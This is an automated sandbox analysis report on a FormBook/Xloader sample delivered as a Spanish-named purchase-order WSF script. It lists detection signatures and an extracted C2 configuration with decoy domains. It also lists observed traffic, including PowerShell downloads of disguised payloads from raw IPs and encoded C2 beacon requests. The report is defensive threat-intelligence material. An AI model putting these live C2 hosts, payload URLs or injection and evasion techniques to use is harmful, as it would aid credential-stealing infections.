Windows Analysis Report
NUEVA ORDEN DE COMPRA 80107.wsf

Overview

General Information

Sample Name: NUEVA ORDEN DE COMPRA 80107.wsf
Analysis ID: 635408
MD5: f9c710eee0ec4b46dfb370e5e2280c36
SHA1: c5b21cdd87ec4c5f8349747ecab5963b40556081
SHA256: 02cda7e8e87599f480515b611d57653429825d45dbfd2bcee0b9f1ea8e845fc6
Tags: Formbook, wsf, Xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign process
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

AV Detection

Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.hibikaiteki.com/s4ig/"], "decoy": ["60carrst-th15.com", "suapeleemprimeirolugar.com", "fairble.com", "7890136.com", "toastingthetunnos.com", "znetonline.net", "ginamora.com", "salazarcomunicacion.com", "acesso-livre-mercado.com", "nancykmorrison.store", "amazonwisely.com", "dannymarkphotography.com", "tenlog029.xyz", "quickfinderplus.online", "abdomenpkluwk.xyz", "portraypsdbmv.top", "arst4you.com", "doublehartpress.com", "deadsdradqueer.com", "salvaescalerasarnet.com", "givingisnotagiven.com", "vellegallery.com", "rtva.top", "nexusbalance.com", "createurs-de-bijoux.com", "kellybavis.com", "giaohanggiaretetkiemhcm.com", "cukis-prakerja.xyz", "dbk3.com", "40dgj.xyz", "bikebrewandflights.com", "lovinlufkin.com", "redentor.digital", "rqgmarket.com", "kindofgoodsco.com", "tb25431.icu", "caui.top", "mercedesfbs4.com", "yadook.com", "rab-pas-vervallen.icu", "shref94.com", "chinafireratedglass.com", "driftwoodbeachclub.com", "mentication.com", "schedulekeymail.com", "cameraderie.photography", "promoapp12.com", "modart.xyz", "choicearticleto-readtoday.info", "prostitutkitambovasuck.info", "mgav21.xyz", "idreamtz.com", "keepcharged.online", "gobigmedia.net", "cookinkele.com", "99lottery.info", "atlantidepc.com", "univerdelacreation.com", "thuongmainongnghiep.com", "thulasiabc.com", "sushifactoryamphawa.com", "emprendedor-virtual.com", "3laaaldin.com", "madisonboles.com"]}
Source: Yara match File source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: http://www.acesso-livre-mercado.com/s4ig/www.40dgj.xyz Avira URL Cloud: Label: malware
Source: http://www.acesso-livre-mercado.com/s4ig/ Avira URL Cloud: Label: malware
Source: http://www.shref94.com/s4ig/www.deadsdradqueer.com Avira URL Cloud: Label: malware
Source: http://www.mentication.com/s4ig/www.prostitutkitambovasuck.info Avira URL Cloud: Label: malware
Source: http://www.shref94.com/s4ig/ Avira URL Cloud: Label: malware
Source: http://www.prostitutkitambovasuck.info/s4ig/TL Avira URL Cloud: Label: malware
Source: http://www.caui.top/s4ig/www.giaohanggiaretetkiemhcm.com Avira URL Cloud: Label: phishing
Source: http://www.createurs-de-bijoux.com/s4ig/ Avira URL Cloud: Label: malware
Source: http://www.prostitutkitambovasuck.info/s4ig/ Avira URL Cloud: Label: malware
Source: www.hibikaiteki.com/s4ig/ Avira URL Cloud: Label: malware
Source: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf Avira URL Cloud: Label: malware
Source: http://www.caui.top/s4ig/ Avira URL Cloud: Label: phishing
Source: http://www.hibikaiteki.com/s4ig/ Avira URL Cloud: Label: malware
Source: http://www.hibikaiteki.com/s4ig/www.caui.top Avira URL Cloud: Label: malware
Source: http://www.createurs-de-bijoux.com/s4ig/www.fairble.com Avira URL Cloud: Label: malware
Source: http://www.giaohanggiaretetkiemhcm.com/s4ig/www.mentication.com Avira URL Cloud: Label: malware
Source: http://www.mentication.com/s4ig/ Avira URL Cloud: Label: malware
Source: http://20.106.232.4/dll/26-05-2022-StartUp.pdf Avira URL Cloud: Label: malware
Source: http://www.giaohanggiaretetkiemhcm.com/s4ig/ Avira URL Cloud: Label: malware
Source: http://20.106.232.4 Avira URL Cloud: Label: malware
Source: 15.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.RegAsm.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.RegAsm.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Binary string: RegAsm.pdb source: explorer.exe, 00000006.00000000.614677532.00000000029E7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000F.00000003.425165861.0000000002754000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: WAUgLeAhDG.pdb source: powershell.exe, 0000000C.00000002.436703755.00000181B4EB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.451254825.00000181CD3D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000F.00000003.425165861.0000000002754000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe
Source: Binary string: RegAsm.pdb4 source: explorer.exe, 00000006.00000000.614677532.00000000029E7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: WAUgLeAhDG.pdbH|^| P|_CorDllMainmscoree.dll source: powershell.exe, 0000000C.00000002.436703755.00000181B4EB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.451254825.00000181CD3D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ddscfIvqgW.pdb source: powershell.exe, 0000000C.00000002.436356861.00000181B4DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.451218272.00000181CCFB0000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop edi 15_2_00415B28
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 4x nop then pop edi 27_2_03225B28

Networking

Source: C:\Windows\explorer.exe Network Connect: 199.34.228.47 80
Source: C:\Windows\explorer.exe Domain query: www.sushifactoryamphawa.com
Source: C:\Windows\explorer.exe Network Connect: 54.203.72.218 80
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.103 80
Source: C:\Windows\explorer.exe Domain query: www.choicearticleto-readtoday.info
Source: C:\Windows\explorer.exe Domain query: www.mgav21.xyz
Source: C:\Windows\explorer.exe Domain query: www.nexusbalance.com
Source: C:\Windows\explorer.exe Network Connect: 45.128.51.66 80
Source: Traffic Snort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 20.106.232.4:80 -> 192.168.2.6:49769
Source: http Bad PDF prefix: HTTP/1.1 200 OK | Date: Fri, 27 May 2022 19:15:48 GMT | Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 | Last-Modified: Thu, 26 May 2022 14:26:51 GMT | ETag: "3aac-5dfeafb144fa1" | Accept-Ranges: bytes | Content-Length: 15020 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/pdf
Source: http Bad PDF prefix: HTTP/1.1 200 OK | Date: Fri, 27 May 2022 19:15:50 GMT | Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 | Last-Modified: Thu, 26 May 2022 14:25:11 GMT | ETag: "1a580-5dfeaf520524a" | Accept-Ranges: bytes | Content-Length: 107904 | Content-Type: application/pdf
Source: C:\Windows\explorer.exe DNS query: www.mgav21.xyz
Source: Yara match File source: 12.2.powershell.exe.181ccfb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.powershell.exe.181b4def050.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.powershell.exe.181b586e7e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.451218272.00000181CCFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Malware configuration extractor URLs: www.hibikaiteki.com/s4ig/
Source: global traffic HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1 | Host: 20.106.232.4 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1 | Host: 20.106.232.4
Source: global traffic HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1 | Host: 2.56.57.22 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=cD7SGqgsMdn1qG9AyDMlGxGbikkTJ3e+SLNAYG8XHeGes8xhGajuA9PSV6Vq4uulpQsNka3DRA== HTTP/1.1 | Host: www.nexusbalance.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /s4ig/?0tx=EE1KxreShStuWGRfOzXQivmJYb01nsHN4Y+USZVKUNF8o5M6FFhEbiUBXOrRFrwbnBV3ymr95w==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1 | Host: www.choicearticleto-readtoday.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG+zKIyPgsbPq7aByYUb53Y7vFTrhhhVYwgCqKyQGNMMvVk3uDgUSApaDProA7A9idTtJxA== HTTP/1.1 | Host: www.sushifactoryamphawa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /s4ig/?0tx=dCXC+2ZT0QRaPMB/1bkCzyFCQOsWt/uhEcdMypxrEdi7eXd+jvTokAesL3IOP6QRIKOYlLryUQ==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1 | Host: www.mgav21.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /daveCrpted.jpg HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: 2.56.57.22 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | X-Powered-By: Express | Content-Type: text/plain; charset=utf-8 | Content-Length: 9 | ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg" | Date: Fri, 27 May 2022 19:18:41 GMT | Connection: close | Server: lighttpd/1.4.54 | Data Raw: 4e 6f 74 20 46 6f 75 6e 64 | Data Ascii: Not Found
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: powershell.exe, 00000001.00000002.401894286.000001FD1C2BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.5
Source: powershell.exe, 00000001.00000002.401894286.000001FD1C2BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.396098842.000001FD1B781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22
Source: powershell.exe, 00000001.00000002.402117178.000001FD1C2E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/daveCrpt
Source: powershell.exe, 00000001.00000002.402117178.000001FD1C2E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/daveCrpted
Source: powershell.exe, 00000001.00000002.396098842.000001FD1B781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.401268481.000001FD1C1F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/daveCrpted.jpg
Source: powershell.exe, 00000001.00000002.396098842.000001FD1B781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/daveCrpted.jpg0y
Source: powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/ts
Source: powershell.exe, 0000000C.00000002.436356861.00000181B4DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/tsdfguhijk.txt
Source: powershell.exe, 0000000C.00000002.436356861.00000181B4DB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22x
Source: powershell.exe, 0000000C.00000002.440905719.00000181B57B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.435361690.00000181B4C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4
Source: powershell.exe, 0000000C.00000003.411833366.00000181CCBB2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.412180807.00000181CCC0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4/dll/26-05-2022-StartUp.pdf
Source: powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf
Source: powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.48
Source: powershell.exe, 0000000C.00000003.425480626.00000181CCBE1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.425363983.00000181CCBB2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.450695738.00000181CCBE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.6.
Source: powershell.exe, 00000001.00000002.408114262.000001FD33570000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.460922771.0000023A9CC81000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000003.454758877.0000023A9CC81000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.425572680.00000181CCB49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.411765873.00000181CCB42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.450505987.00000181CCB4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.429086805.000001DF7AF1F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.448733396.000001DF7AF1F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.448691203.000001DF7AF14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.429054912.000001DF7AF14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000006.00000002.893555318.0000000002B62000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 0000002D.00000000.800415713.0000000004A42000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://img.sedoparking.com
Source: powershell.exe, 00000001.00000002.406922081.000001FD2B5D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.447539481.00000181C4A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.446574642.000001DF10071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.435103706.000001DF00212000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.395307663.000001FD1B571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.457098102.0000023A84A91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.434525264.00000181B4A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.434802938.000001DF00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.40dgj.xyz
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.40dgj.xyz/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.40dgj.xyz/s4ig/www.bikebrewandflights.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.40dgj.xyzReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.acesso-livre-mercado.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.acesso-livre-mercado.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.acesso-livre-mercado.com/s4ig/www.40dgj.xyz
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.acesso-livre-mercado.comReferer:
Source: powershell.exe, 0000000D.00000002.435103706.000001DF00212000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bikebrewandflights.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bikebrewandflights.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bikebrewandflights.com/s4ig/www.hibikaiteki.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bikebrewandflights.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.caui.top
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.caui.top/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.caui.top/s4ig/www.giaohanggiaretetkiemhcm.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.caui.topReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.choicearticleto-readtoday.info
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.choicearticleto-readtoday.info/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.choicearticleto-readtoday.info/s4ig/www.sushifactoryamphawa.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.choicearticleto-readtoday.infoReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.createurs-de-bijoux.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.createurs-de-bijoux.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.createurs-de-bijoux.com/s4ig/www.fairble.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.createurs-de-bijoux.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.deadsdradqueer.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.deadsdradqueer.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.deadsdradqueer.com/s4ig/www.acesso-livre-mercado.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.deadsdradqueer.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fairble.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fairble.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fairble.com/s4ig/www.shref94.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fairble.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.giaohanggiaretetkiemhcm.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.giaohanggiaretetkiemhcm.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.giaohanggiaretetkiemhcm.com/s4ig/www.mentication.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.giaohanggiaretetkiemhcm.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.hibikaiteki.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.hibikaiteki.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.hibikaiteki.com/s4ig/www.caui.top
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.hibikaiteki.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mentication.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mentication.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mentication.com/s4ig/www.prostitutkitambovasuck.info
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mentication.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mgav21.xyz
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mgav21.xyz/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mgav21.xyz/s4ig/www.createurs-de-bijoux.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mgav21.xyzReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.nexusbalance.com
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.nexusbalance.com/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.nexusbalance.com/s4ig/www.choicearticleto-readtoday.info
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.nexusbalance.comReferer:
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.prostitutkitambovasuck.info
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.prostitutkitambovasuck.info/s4ig/
Source: explorer.exe, 00000006.00000002.890540740.00000000005D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.prostitutkitambovasuck.info/s4ig/TL
